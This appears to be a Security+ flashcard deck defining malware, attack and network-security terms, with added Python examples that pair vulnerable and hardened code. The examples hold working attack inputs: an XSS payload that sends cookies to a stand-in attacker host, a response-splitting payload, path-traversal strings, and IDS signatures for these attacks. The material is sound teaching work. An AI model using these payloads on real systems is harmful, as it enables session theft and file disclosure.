Comptia Certmaster Practice For Security+
Crypto-malware
A type of ransomware that encrypts the user's data. The user will be unable to access the files without obtaining the private encryption key, which is held by the attacker.
Trapdoor Function
A function that is easy to compute in one direction, yet believed to be difficult to compute in the opposite direction (finding its inverse) without special information, called the "trapdoor." Widely used in cryptography.
Ransomware
is a type of Trojan malware that tries to extort money from the victim. It displays threatening messages stating that the computer will remain locked (or the files encrypted) until the ransom is paid.
Trojan
is a malicious program hidden within an innocuous-seeming piece of software. Usually, the Trojan tries to compromise the security of the target computer.
Rogueware
is a fake antivirus, where a web pop-up claims to have detected viruses on the computer and prompts the user to initiate a full scan, which installs the attacker's Trojan.
Adware
is a type of software or browser plug-in that is similar to spyware. If the user accepts the data use policy and the program generally behaves like any other commercial software installation, then it's not spyware.
RAT (Remote Access Trojan) backdoor applications can allow the attacker to use the computer in a botnet to launch DDoS attacks.
True
RAT backdoor applications can allow the attacker to use the computer in a botnet to launch mass-mail spam attacks.
True
A RAT does not have to establish a connection from the compromised host to a Command and Control (C2 or C&C) host or network operated by the attacker.
False
Tailgating
is a social engineering technique to gain access to a building by following someone else (or persuading them to "hold the door").
Spyware
is a program that monitors user activity and sends the information to someone else. This can occur with or without the user's knowledge.
rootkit
is backdoor malware that modifies core system files and programming interfaces so that local shell processes (those that list processes, files or network connections) no longer reveal its presence.
botnet
is a set of computers that have been infected by a control program called a bot, which enables attackers to use the computers to mount attacks.
Remote Access Trojan (RAT)
functions as a backdoor and allows the attacker to access the PC, upload files, and install software on it.
SIM swap fraud illustrates what type of an attacker?
Organized Crime
DNS harvesting
Using OSINT sources (such as WHOIS and public DNS records) to gather information about a target's domain.
Topology discovery (footprinting)
is the part of the discovery phase where the attacker or pen tester starts to identify the structure of the target network.
Host Discovery
Determining which IP addresses in the network have live system. Techniques include ARP scans, passive listening, ICMP Sweeps, IPv6 neighbor discovery and many more.
Clickjacking
is a hijacking attack that forces a user to unintentionally click a link that is embedded in or hidden by other web page elements.
MitB (Man-in-the-Browser) attack
is where the web browser itself is compromised by installing malicious plug-ins or scripts, or by intercepting API calls, so the attacker can read and alter pages and form data before they are encrypted. Exploit kits can be installed on a website to actively try to exploit vulnerabilities in clients browsing the site.
XSRF (cross-site request forgery)
is a malicious script or form hosted on the attacker's site that exploits a session the user has already started on another site in the same browser: the browser automatically attaches the victim's cookies, so the forged request is processed as if the user had made it.
HTTP Response Splitting
occurs when the attacker crafts a malicious URL (or other input) that the web application reflects into an HTTP response header without validation. Embedded CRLF (\r\n) sequences end the header early and let the attacker append a second, fully attacker-controlled response. The attacker convinces the victim to submit the URL, and the victim's browser or an intermediate proxy cache treats the injected response as if it came from the server.
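The following is an added example, not part of the CertMaster material. It shows a redirect handler that pastes a user-controlled value into the Location header, a constructed payload that splits the response, and the hardened version that refuses control characters. The handler names, the payload and the crude response counter are assumptions made for the demonstration.

```python
def build_redirect_vulnerable(location: str) -> bytes:
    """Vulnerable: the user-controlled value is copied straight into a header.
    (Assumes the framework has already URL-decoded %0d%0a into CR LF.)"""
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {location}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


def build_redirect_safe(location: str) -> bytes:
    """Hardened: no CR, LF or any other control character may enter a header value."""
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in location):
        raise ValueError("control character in header value")
    return build_redirect_vulnerable(location)


def count_responses(raw: bytes) -> int:
    """How many HTTP responses a naive client or cache would parse out of `raw`:
    one per status line that starts a message."""
    return sum(1 for line in raw.split(b"\r\n") if line.startswith(b"HTTP/1."))


# Constructed attacker input: ends the redirect early, then appends a second
# response whose body the attacker controls (19 bytes of HTML).
SPLIT_PAYLOAD = (
    "http://example.com/\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 19\r\n"
    "\r\n"
    "<h1>owned page</h1>"
)

if __name__ == "__main__":
    print("vulnerable handler emits", count_responses(build_redirect_vulnerable(SPLIT_PAYLOAD)), "responses")
    try:
        build_redirect_safe(SPLIT_PAYLOAD)
    except ValueError as exc:
        print("hardened handler rejected the payload:", exc)
```

The second response is the dangerous one: a shared proxy that caches it under the victim's URL will serve the attacker's page to every later visitor, and a browser that receives it will run the attacker's HTML in the site's origin.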
LSOs (Locally Shared Objects), or Flash cookies
are data that is stored on a user's computer by websites that use Adobe Flash Player. A site may be able to track a user's browsing behavior through LSOs.
replay attack
consists of intercepting a key or password hash, then reusing it to gain access to a resource, such as the pass-the-hash attack.
birthday attack
is a type of brute force attack aimed at exploiting collisions in hash functions. This type of attack can be used for the purpose of forging a digital signature.
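As an added example that is not from the CertMaster deck, the script below runs a birthday attack against a deliberately truncated hash (the first 28 bits of SHA-256, an assumption made so the collision is found in a second or two). It hashes distinct candidate messages, remembers every digest, and stops at the first repeat. The point to observe is the work factor: roughly the square root of the output space rather than the whole space, which is why an attacker who can get a victim to sign one of two colliding documents can forge a signature on the other.

```python
import hashlib
import math
from itertools import count


def truncated_hash(data: bytes, bits: int) -> int:
    """First `bits` bits of SHA-256(data), as an int. A deliberately short
    digest (assumption for the demo) so the birthday bound is reachable quickly."""
    digest = int.from_bytes(hashlib.sha256(data).digest(), "big")
    return digest >> (256 - bits)


def expected_trials(bits: int) -> float:
    """Expected number of random inputs hashed before the first collision among
    N = 2**bits possible outputs: roughly sqrt(pi * N / 2)."""
    return math.sqrt(math.pi * 2 ** bits / 2)


def find_collision(bits: int, prefix: bytes = b"contract-v"):
    """Birthday attack: hash distinct candidate messages, remember each digest,
    stop at the first repeat. Returns (message1, message2, digest, attempts)."""
    seen = {}
    for i in count():
        msg = prefix + str(i).encode()
        h = truncated_hash(msg, bits)
        if h in seen:
            return seen[h], msg, h, i + 1
        seen[h] = msg


if __name__ == "__main__":
    bits = 28
    m1, m2, h, attempts = find_collision(bits)
    print(f"{bits}-bit hash: collision after {attempts} hashes "
          f"(expected ~{expected_trials(bits):.0f}; brute-forcing one fixed target is ~{2 ** bits})")
    print(m1, m2, hex(h))
```

Against a real 256-bit hash the same loop would need about 2^128 operations, which is why collision resistance of the hash, not just preimage resistance, is what a signature scheme depends on.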
War driving
is the practice of using a Wi-Fi sniffer to detect WLANs and then either making use of them or trying to break into them (using WEP and WPA cracking tools).
Skimming
is an RFID attack where an attacker uses a fraudulent RFID reader to read the signals from a contactless bank card.
DNS Server Cache poisoning
is a redirection attack that aims to corrupt the records held by the DNS server itself. The intention is to redirect traffic for a legitimate domain to a malicious IP address.
Address Resolution Protocol (ARP) poisoning
occurs when an attacker with access to the local network sends forged ARP replies so that an IP address is mapped to the MAC address of a computer that is not the intended recipient (usually the attacker's own machine), allowing traffic to be intercepted or dropped.
Cross-site scripting (XSS)
is a malicious script hosted on the attacker's site or coded in a link injected onto a trusted site designed to compromise clients browsing the trusted site.
Bluesnarfing
refers to using an exploit in Bluetooth to steal information from someone else's phone. The exploit (now patched) allows attackers to circumvent the authentication mechanism.
consensus/social proof impersonation
an attacker fools users into believing that a malicious website is legitimate by posting fake reviews. The victims believe the reviews and place their trust in the website.
Refactoring
means the code performs the same function by using different methods. Refactoring means that the antivirus software may no longer identify the malware by its signature.
shim
A small code library that sits between an application and the operating system or an API, intercepting calls and translating them so that legacy software keeps working (the mechanism behind compatibility mode). Malware can abuse the same mechanism to insert its own code into a legitimate process.
pointer
is a reference to an object in memory. Attempting to access that memory address is called dereferencing.
integer overflow attack
causes the target software to calculate a value that exceeds the upper or lower bound of its integer type, so the stored value wraps around (a large positive result can become small or negative). This can defeat length and bounds checks and lead to buffer overflows.
To crack WEP
a replay attack is used to make the AP generate lots of IV packets, usually by replaying ARP packets at it, and cycle through IV values quickly.
Mirroring mode
allows another VM to sniff the unicast packets addressed to a remote interface (like a spanned port on a hardware switch).
Distributed Reflection Denial of Service (DRDoS) attack
the adversary spoofs the victim's IP address and attempts to open connections with multiple servers. Those servers direct their SYN/ACK responses to the victim server. This rapidly consumes the victim's available bandwidth.
deauthentication attack
sends a stream of spoofed deauth frames to cause a client to deauthenticate from an AP. This might allow the attacker to interpose the rogue AP or sniff information about the authentication process.
disassociation attack
hits the target with disassociation packets and is used to perform a Denial of Service (DoS) attack against the wireless infrastructure.
ARP poisoning
occurs when an attacker, with access to the network, redirects an IP address to the MAC address of an unintended computer.
Transmission Control Protocol/Internet Protocol (TCP/IP) hijacking
is a type of spoofing attack where the attacker knocks a host off the network, then replaces it with their own machine, spoofing the original host's IP address.
watering hole attack
is a directed social engineering attack. It relies on the circumstance that a group of targets may use an insecure third-party website.
hoax attack
an email alert or web pop-up will claim to have identified some sort of security problem, like a virus infection, and offer a tool to fix the problem, but the tool will be some sort of Trojan application.
Pharming
relies on corrupting the way the victim's computer performs Internet name resolution, so that they are redirected from the genuine site to the malicious one.
Directory traversal
occurs when the attacker gains access to a file outside the web server's root directory, typically by submitting a path containing ../ sequences (often URL-encoded) that the application fails to canonicalize and check against the root.
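An added example (not CertMaster content) of the check that stops directory traversal: a naive join that lets ../ climb out of the document root beside a hardened resolver that decodes once, normalizes, and then proves the result is still under the root. The document root path and the inputs are assumptions for the demo.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"  # assumed document root for this example


def resolve_vulnerable(requested: str) -> str:
    """Naive join plus normalisation: '..' components climb out of the root."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, requested))


def resolve_safe(requested: str, root: str = WEB_ROOT) -> str:
    """Decode exactly once, normalise, then verify the result lies under `root`."""
    decoded = unquote(requested)
    if "%" in decoded:          # double-encoded input (%252e): decode once, reject the rest
        raise ValueError("unexpected percent-encoding after decoding")
    if "\x00" in decoded:       # NUL truncation trick against C-based file APIs
        raise ValueError("NUL byte in path")
    # Treat the request as relative to the root even if it starts with '/'.
    candidate = posixpath.normpath(root + "/" + decoded.lstrip("/"))
    if posixpath.commonpath([root, candidate]) != root:
        raise ValueError(f"path escapes web root: {requested!r}")
    return candidate


if __name__ == "__main__":
    for path in ("images/logo.png", "../../../etc/passwd", "..%2F..%2F..%2Fetc%2Fpasswd"):
        naive = resolve_vulnerable(unquote(path))
        try:
            print(f"{path!r}: naive={naive} safe={resolve_safe(path)}")
        except ValueError as exc:
            print(f"{path!r}: naive={naive} safe=REJECTED ({exc})")
```

The important part is the final comparison against the canonical root: blacklisting the literal string "../" is not enough, because encodings, backslashes on Windows servers, and symlinks all produce paths that look different but resolve to the same place.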
Transitive access
describes the problem of authorizing a request for a service that depends on an intermediate service.
NFC
A wireless technology (near field communication) that lets your mobile device communicate over very short distances, such as when paying for goods on wireless payment devices. It does not provide encryption.
Mutual authentication
is a security mechanism that requires that each party in a communication verifies each other's identity and helps in avoiding Man-in-the-Middle attacks.
URL hijacking (also called typosquatting)
relies on users navigating to misspelled domains. An attacker registers a domain name with a misspelling of an existing domain. Users who misspell a URL in a web browser are taken to the attacker's website.
Reflected Cross-Site Scripting (XSS)
exploits missing server-side input validation or output encoding: a script supplied in the request (typically in a crafted link) is echoed back in the page, and when the victim opens the link the malicious code executes in their browser with the trusted site's origin.
Stored (or persistent) Cross-Site Scripting (XSS)
is a server-side script attack that inserts code into a back-end database used by the trusted site.
Document Object Model (DOM) Cross-Site Scripting (XSS)
exploits vulnerabilities in client-side scripts to modify the content and layout of a web page.
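The following is an added example, not from the CertMaster deck, covering the reflected and stored XSS cards above. It renders a search page from a query string and a list of stored comments three ways: raw, escaped for HTML text only, and escaped for the context each value lands in. A small parser then audits the output for script tags and event-handler attributes. The payloads, template and parser are constructed for the demo.

```python
import html
from html.parser import HTMLParser

# Constructed attacker inputs (not from any real site).
BODY_PAYLOAD = "<script>document.location='http://attacker.invalid/?c='+document.cookie</script>"
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def render_vulnerable(query: str, comments: list) -> str:
    """Reflected (query) and stored (comments) XSS: raw strings pasted into HTML."""
    items = "".join(f"<li>{c}</li>" for c in comments)
    return f'<input name="q" value="{query}"><p>Results for {query}</p><ul>{items}</ul>'


def render_partial(query: str, comments: list) -> str:
    """Common mistake: escaping <, > and & but not quotes, which is not enough
    inside an attribute value."""
    q = html.escape(query, quote=False)
    items = "".join(f"<li>{html.escape(c, quote=False)}</li>" for c in comments)
    return f'<input name="q" value="{q}"><p>Results for {q}</p><ul>{items}</ul>'


def render_safe(query: str, comments: list) -> str:
    """Encode for the context the data lands in: quote=True also neutralises
    the quote characters that close an attribute value."""
    q_attr = html.escape(query, quote=True)
    q_text = html.escape(query)
    items = "".join(f"<li>{html.escape(c)}</li>" for c in comments)
    return f'<input name="q" value="{q_attr}"><p>Results for {q_text}</p><ul>{items}</ul>'


class TagAudit(HTMLParser):
    """Parses a fragment the way a browser would and records what got injected."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.event_handlers = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        self.event_handlers += [name for name, _ in attrs if name.startswith("on")]


def audit(fragment: str):
    """Return (number of <script> tags, list of on* attributes) found in the fragment."""
    parser = TagAudit()
    parser.feed(fragment)
    return parser.script_tags, parser.event_handlers


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("partial", render_partial), ("safe", render_safe)):
        print(f"{name:10}: script tags, handlers = {audit(render(ATTR_PAYLOAD, [BODY_PAYLOAD]))}")
```

Output encoding per context is the fix the page's definitions point at; a Content-Security-Policy header that disallows inline script is the defence-in-depth layer that limits damage when an encoding bug slips through.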
Frequency Analysis
A cryptanalysis technique based on the fact that certain letters (E, T, A, O, ...) appear far more often in English text than others. Comparing the frequency of symbols in a ciphertext with the expected English distribution reveals the substitution or shift used by a classical cipher.
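An added example (not CertMaster content) of frequency analysis in practice: a constructed English message is encrypted with a shift (Caesar) cipher, then every candidate shift is scored with a chi-squared test against the standard English letter frequencies and the lowest score wins. The plaintext and the shift of 7 are assumptions for the demo; the frequency table is the usual published one.

```python
from collections import Counter

# Relative frequency (percent) of A..Z in English text.
ENGLISH_FREQ = [8.17, 1.49, 2.78, 4.25, 12.70, 2.23, 2.02, 6.09, 6.97, 0.15, 0.77, 4.03, 2.41,
                6.75, 7.51, 1.93, 0.10, 5.99, 6.33, 9.06, 2.76, 0.98, 2.36, 0.15, 1.97, 0.07]

# Constructed sample plaintext for the demonstration.
PLAIN = ("SECURITY ANALYSTS MONITOR THE NETWORK FOR SIGNS OF INTRUSION AND RESPOND TO "
         "INCIDENTS BEFORE THE ATTACKER CAN ESCALATE PRIVILEGES OR EXFILTRATE DATA. "
         "THE CHIEF INFORMATION SECURITY OFFICER EXPECTS A WRITTEN REPORT WITHIN THE HOUR.")


def shift_text(text: str, shift: int) -> str:
    """Caesar shift; negative shift decrypts. Non-letters pass through."""
    out = []
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def letter_frequencies(text: str) -> list:
    """Percentage of each letter A..Z in `text` (26 floats)."""
    counts = Counter(ch for ch in text.upper() if "A" <= ch <= "Z")
    total = sum(counts.values()) or 1
    return [100.0 * counts[chr(ord("A") + i)] / total for i in range(26)]


def chi_squared(observed: list, expected: list) -> float:
    """How far an observed distribution is from the expected one (lower is closer)."""
    return sum((o - e) ** 2 / e for o, e in zip(observed, expected))


def break_shift(ciphertext: str):
    """Try all 26 shifts, keep the one whose decryption looks most like English.
    Returns (shift, plaintext, scores-by-shift)."""
    scores = {s: chi_squared(letter_frequencies(shift_text(ciphertext, -s)), ENGLISH_FREQ)
              for s in range(26)}
    best = min(scores, key=scores.get)
    return best, shift_text(ciphertext, -best), scores


if __name__ == "__main__":
    ciphertext = shift_text(PLAIN, 7)
    shift, recovered, scores = break_shift(ciphertext)
    print("ciphertext:", ciphertext[:60], "...")
    print(f"recovered shift {shift} (score {scores[shift]:.1f}); next best {sorted(scores.values())[1]:.1f}")
    print("plaintext: ", recovered[:60], "...")
```

The same scoring works for a general monoalphabetic substitution, except that there the attacker matches the most frequent ciphertext symbols to E, T, A one at a time rather than testing 26 shifts.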
privacy filter
is a security control that allows only the user to see the screen contents, thus preventing shoulder surfing.
colocation
is a data center that contains racks with networking equipment owned by different companies.
Kiting
is the act of continually registering, deleting, and reregistering a name within the five-day grace period without having to pay for it.
Tasting
is an abuse of domain registration in which a domain is registered temporarily to see how many hits it generates within the five-day grace period, then dropped before payment is due.
initial exploitation phase
an exploit is used to gain access to the target's network. This might be accomplished using a phishing email and payload, or by obtaining credentials via social engineering.
Pen testing is considered an active reconnaissance technique.
True
Name 2 techniques in active reconnaissance
1. Gaining physical access 2. Using scanning tools
Is gathering OSINT referred to as passive or active reconnaissance?
Passive
pivot point
is a system and/or set of privileges that allow the tester to compromise other network systems (lateral spread).
Host scanning
uses software tools to obtain information about a host or network topology, and is associated with the reconnaissance phase of a pen test.
Phishing
is the social engineering tactic in which an attacker attempts to obtain sensitive information from a user by posing as a trustworthy figure through email communications.
In what phase of Pen testing is a phishing email used?
Initial Exploitation phase
malicious payload
is code that will run on the target system, performing some kind of task or giving the attacker interactive control.
In what phase is a malicious payload used?
initial exploitation phase
Persistence
is the tester's ability to reconnect to the compromised host and use it as a remote access tool (RAT) or backdoor.
What follows persistence in a pen test attack life cycle?
Further reconnaissance
What precedes Persistence in a pen testing life cycle?
Initial exploitation
Action on objectives
means carrying out the work as defined by the tester or client.
An example of an Action on objectives
Data exfiltration
gray box pen test
the consultant is given some information; this resembles the knowledge of junior or non-IT staff to model types of insider threats.
Pen testing is always an active reconnaissance technique.
True
Vulnerability scanning
is the process of auditing a network (or application) for known vulnerabilities.
Vulnerability scanning exploits the vulnerabilities it discovers.
False
What are 3 ways to accomplish initial exploitation?
1. Phishing 2. Social Engineering Attack 3. Malicious payload
What phase is Host Scanning associated?
Reconnaissance
Why are active scans scheduled during periods of network downtime?
They are more likely to cause performance problems with the host.
Passive Scanning techniques
1. Sniffing network traffic to identify assets communicating on the network. 2. Identifying the ports in use. 3. Discovering some types of vulnerabilities.
Active Scanning techniques
involve making a connection to the target host. This might mean authenticating and establishing a session with the host or running an agent on a host.
HSM
Hardware security module. A removable or external device (card or appliance) that generates, stores and manages cryptographic keys, such as the RSA keys used in asymmetric encryption, inside tamper-resistant hardware so that private keys never leave the device. High-volume e-commerce sites use HSMs to offload and accelerate SSL/TLS handshakes. High-availability clusters needing encryption services can use clustered HSMs.
TPM
Trusted Platform Module. A hardware chip on the motherboard included on many newer laptops and desktops. A TPM contains a unique asymmetric key burned in at manufacture (the endorsement key) and can generate and store other keys used for encryption, decryption and authentication. The TPM does not encrypt the disk itself: it protects the keys used by full disk encryption products such as BitLocker and releases them only when the measured boot state matches.
IAM
Identity and Access Management is a security process that provides identification, authentication, and authorization mechanisms for users, computers, and other entities to work with organizational assets.
The kernels or operating systems that run on embedded system devices must be much more stable and reliable than the OS that runs a desktop computer or server.
True
Two main issues with firewalls implemented on the device firmware.
1. The lack of processing power 2. The memory space available to run functions.
Wrappers
One way of increasing the security of data in transit for embedded systems. It usually includes a header, which precedes the encapsulated data, and a trailer, which follows it.
DLL injection
is an attack technique in which a running Windows process is forced to load an attacker-chosen dynamic-link library (DLL) into its address space, so the injected code runs with the victim process's privileges. It can be used to hook API calls, leak sensitive information or destabilize the application.
Two reasons why many medical devices with embedded systems are vulnerable to malicious exploits?
1. Their control systems use outdated operating systems. 2. They use insecure communication protocols.
3 things that help ensure an application is secure before the release?
1. Error handling 2. Proper authentication and authorization 3. Input validation
Tethering
allows a mobile device to share its cellular data or WiFi connection with other devices (tethering). A malicious user can set up such an access point with something as basic as a smartphone with tethering capabilities.
USB OTG (On the Go)
allows a port to function either as a host or as a device.
Security on default configurations of devices from vendors is strong.
False
Pinch Point
is a single point of failure that relies on a single hardware server or appliance or network channel.
S/MIME (Secure/Multipurpose Internet Mail Extensions)
is an email encryption standard that adds digital signatures and public key cryptography to email.
An out-of-band link offers better security than in-band.
True
Rulesets
are a configuration setting for the intrusion detection system (IDS).
Examples of Rulesets
Content filtering, such as blocking URLs and applying keyword-sensitive blacklists or whitelists.
layer 3 device
operates on the network layer. Common devices like a router operate at layer 3 to route traffic based on IP addresses.
layer 2 device
A network device that makes forwarding decisions based on the destination MAC address in the frame header. Mostly describes a basic Ethernet switch.
VPN (Virtual Private Network) concentrator
a device that incorporates advanced encryption and authentication methods, to handle many VPN tunnels.
proxy server
sits between clients and the internet and makes requests on their behalf. A caching proxy places information retrieved from the internet into a temporary storage area so that if the information is requested again by another client, it is served locally. This reduces the number of calls to the internet and speeds up performance.
switch loop
occurs when there is more than one active layer 2 path between switches. Frames (especially broadcasts, which have no TTL) circulate endlessly, MAC address tables flap, and network connections drop because frames cannot reliably reach their final destination. Loops generate broadcast storms; STP exists to block the redundant paths.
broadcast storm
When there is an accumulation of broadcast and multicast packet traffic on the LAN coming from one or more network interfaces.
Dummy switches
Basic switches to allow traffic to flow freely. They normally don't have any advanced configurations.
Signature-based (or pattern-matching) detection
uses a database of attack patterns or signatures. If traffic matches a pattern, then the engine generates an incident.
Anomaly-based detection
uses an engine that looks for irregularities in the use of protocols. For example, the engine may check packet headers or the exchange of packets in a session against RFC standards and generate an alert, if they deviate from strict RFC compliance.
Heuristic-based detection
learns from experience to detect differences from the baseline. This type of detection is the same as behavioral-based detection.
Behavioral-based (statistical or profile-based) detection
uses an engine to recognize baseline "normal" traffic or events. Any deviation from the baseline (outside a defined level of tolerance) generates an incident.
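The following is an added example, not CertMaster content, that runs the three detection styles from the cards above over constructed web-access log lines (format assumed: client, method, path, status). Signature detection matches known-bad patterns, anomaly detection flags traffic that breaks the protocol specification, and behavioral detection learns a per-client request baseline from a training window and alerts on deviations beyond a tolerance.

```python
import re
import statistics
from collections import Counter
from urllib.parse import unquote_plus

# Constructed log lines: "client method path status". Not from any real server.
TRAINING_LOG = [
    "10.0.0.5 GET /index.html 200", "10.0.0.5 GET /about.html 200", "10.0.0.5 POST /login 302",
    "10.0.0.6 GET /index.html 200", "10.0.0.6 GET /news.html 200",
    "10.0.0.7 GET /index.html 200", "10.0.0.7 GET /contact.html 200",
    "10.0.0.7 GET /news.html 200", "10.0.0.7 POST /login 302",
]
LIVE_LOG = [
    "10.0.0.5 GET /index.html 200",
    "10.0.0.9 GET /../../etc/passwd 404",
    "10.0.0.9 GET /search?q=%27+OR+%271%27%3D%271 200",
    "10.0.0.7 FOO /index.html 400",
] + ["10.0.0.8 GET /login 200"] * 12   # one client hammering the login page

# Signature engine: known attack patterns (hypothetical rule names).
SIGNATURES = {
    "path-traversal": re.compile(r"\.\./"),
    "sqli-tautology": re.compile(r"(?i)'\s*or\s*'1'\s*=\s*'1"),
}
# Anomaly engine: what the HTTP specification allows.
RFC_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "CONNECT", "OPTIONS", "TRACE", "PATCH"}


def parse(line: str) -> dict:
    client, method, path, status = line.split()
    return {"client": client, "method": method, "path": unquote_plus(path), "status": status}


def signature_alerts(lines):
    """(rule name, line) for every line whose decoded path matches a known signature."""
    alerts = []
    for line in lines:
        path = parse(line)["path"]
        alerts += [(name, line) for name, rx in SIGNATURES.items() if rx.search(path)]
    return alerts


def anomaly_alerts(lines):
    """Lines that violate the protocol: unknown method or impossible status code."""
    alerts = []
    for line in lines:
        rec = parse(line)
        if rec["method"] not in RFC_METHODS:
            alerts.append(("unknown-method", line))
        elif not (rec["status"].isdigit() and 100 <= int(rec["status"]) <= 599):
            alerts.append(("invalid-status", line))
    return alerts


def build_baseline(training):
    """Mean and standard deviation of requests per client in the training window."""
    counts = Counter(parse(line)["client"] for line in training)
    values = list(counts.values())
    return statistics.mean(values), statistics.stdev(values)


def behavioral_alerts(lines, training, tolerance: float = 3.0):
    """(client, request count) for clients above mean + tolerance * stdev of the baseline."""
    mean, stdev = build_baseline(training)
    threshold = mean + tolerance * max(stdev, 1.0)   # floor the spread so a flat baseline is not zero-tolerance
    counts = Counter(parse(line)["client"] for line in lines)
    return [(client, n) for client, n in counts.items() if n > threshold]


if __name__ == "__main__":
    print("signature :", signature_alerts(LIVE_LOG))
    print("anomaly   :", anomaly_alerts(LIVE_LOG))
    print("behavioral:", behavioral_alerts(LIVE_LOG, TRAINING_LOG))
```

Note what each engine misses: the signature engine says nothing about the login flood, the anomaly engine only sees the malformed request, and the behavioral engine cannot name the attack it flagged. Production systems run all three for that reason.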
tunnel mode
is used by IPsec to encrypt the entire original IP packet (header and payload) and wrap it in a new IP header addressed to the remote gateway. This mode is used mostly for gateway-to-gateway (site-to-site) links across untrusted networks such as the internet.
transport mode
is used by IPsec to encrypt only the payload of the IP packet, leaving the original IP header in the clear. This mode is used mostly for host-to-host communication within private networks.
Cipher Modes
(modes of operation) refer to the way a block cipher is applied to a message longer than one block. ECB (Electronic Code Book) is the simplest mode: every block is encrypted independently with the same key, so identical plaintext blocks produce identical ciphertext blocks and patterns in the data leak through.
counter mode
(CTR) is a cipher mode of operation in which the block cipher encrypts a nonce combined with an incrementing counter to produce a keystream that is XORed with the plaintext. It turns the block cipher into a stream cipher, allows blocks to be processed in parallel, and is secure only if a nonce/counter value is never reused under the same key.
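An added example, not from CertMaster, covering both cipher-mode cards above. It builds CTR mode from scratch and shows the ECB pattern leak. One assumption to note: the block cipher's encrypt direction is stood in for by HMAC-SHA256 truncated to 16 bytes, because the Python standard library has no block cipher. That is enough for CTR (which only ever uses the forward direction) and for showing that ECB maps equal blocks to equal outputs; it is not a real cipher, and ecb_encrypt here cannot be reversed.

```python
import hashlib
import hmac

BLOCK = 16


def block_function(key: bytes, block_in: bytes) -> bytes:
    """Stand-in for the block cipher's encrypt direction (assumption for this
    example: HMAC-SHA256 truncated to one 16-byte block)."""
    return hmac.new(key, block_in, hashlib.sha256).digest()[:BLOCK]


def ctr_keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """CTR keystream: encrypt nonce || counter for counter = 0, 1, 2, ..."""
    if len(nonce) != 8:
        raise ValueError("nonce must be 8 bytes (leaving 8 bytes for the counter)")
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += block_function(key, nonce + counter.to_bytes(8, "big"))
        counter += 1
    return bytes(out[:length])


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def ctr_crypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Encryption and decryption are the same operation: XOR with the keystream."""
    return xor_bytes(data, ctr_keystream(key, nonce, len(data)))


def ecb_encrypt(key: bytes, data: bytes) -> bytes:
    """ECB: each block processed independently (demo of the pattern leak only)."""
    if len(data) % BLOCK:
        raise ValueError("ECB demo needs a whole number of blocks")
    return b"".join(block_function(key, data[i:i + BLOCK]) for i in range(0, len(data), BLOCK))


if __name__ == "__main__":
    key = b"\x42" * 32                      # constructed demo key
    nonce = b"\x00" * 8
    msg = b"ATTACK AT DAWN!!" * 2          # two identical 16-byte blocks
    ecb = ecb_encrypt(key, msg)
    print("ECB identical blocks leak:", ecb[:BLOCK] == ecb[BLOCK:])
    ctr = ctr_crypt(key, nonce, msg)
    print("CTR blocks differ:        ", ctr[:BLOCK] != ctr[BLOCK:])
    print("CTR round trip:           ", ctr_crypt(key, nonce, ctr) == msg)
    other = ctr_crypt(key, nonce, b"RETREAT AT NOON!" * 2)   # same nonce reused
    print("nonce reuse leaks m1^m2:  ", xor_bytes(ctr, other) == xor_bytes(msg, b"RETREAT AT NOON!" * 2))
```

The last line is the CTR failure mode worth remembering: reusing a nonce under one key gives an eavesdropper the XOR of the two plaintexts without touching the key.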
benefit (or pro) for deploying an SSL decryptor
is that it will block connections that use weak cipher suites or implementations and block connections that cannot be inspected.
multipurpose proxy server
can be configured with filters for multiple protocol types, such as HTTP (Hypertext Transfer Protocol), FTP (File Transfer Protocol), and SMTP (Simple Mail Transfer Protocol).
web proxy,
will only filter out content from the web.
transparent class of proxies
requires no extra configuration of client computers. This proxy intercepts client traffic through a switch, router or other inline network appliance.
non-transparent class of proxies
requires a client to be configured with the proxy server address and port settings.
active/active cluster
provides Enterprise services to clients from both virtual servers. All services will transparently transfer to the other server if one virtual host goes offline.
active/passive cluster
provides Enterprise services to clients from only one virtual server. The other server comes online only when the currently active server goes offline.
session affinity setting
is used in load balancing scenarios. This is also known as source IP (internet protocol) and is a layer 4 approach to handling user sessions.
round robin setting
is used in load balancing scenarios. New client sessions are established with the next server in the group. Round robin and affinity provide stateless fault tolerance.
remote access virtual private network (VPN)
involves VPN client agents connecting to a VPN-enabled router concentrator at the company's main network. This is ideal for telecommuters. If used with TLS or SSL VPN, port 443 will be used.
TLS (Transport Layer Security) VPN
will require a remote server listening on port 443 (so no changes to firewalls) and optionally, a set of client certificates for authenticating the device (transparent for users after simple set up).
site-to-site VPN
A type of VPN in which VPN gateways at multiple sites encrypt and encapsulate data to exchange over a tunnel with other VPN gateways. Meanwhile, clients, servers, and other hosts on a site-to-site VPN communicate with the VPN gateway.
TPM or Trusted Platform Module
is a hardware security module that BitLocker uses to link an encrypted hard drive with a specific system.
Most Wi-Fi routers come with a transmit (Tx) power setting, which can be reduced to a lower output to reduce the range of the wireless signal.
True
Yagi or Yagi-Uda array
is described as a rod with fins. It is a directional antenna.
rubber ducky or dipole antennas
are plastic-coated rods used on wireless access points (WAPs).
What do WAPs without any antennas use?
Omnidirectional vertical rod-type antennas, which receive and send signal in all directions.
MAC (media access control) filtering
specifies a list of valid MAC addresses of devices that will be allowed to connect to the WAP (wireless access point).
SSID
service set identifier is the network name that helps users identify the correct WAP to connect to. An extended SSID (ESSID) is the same SSID shared by multiple access points that together form one extended service set, so that clients can roam between them.
access control list
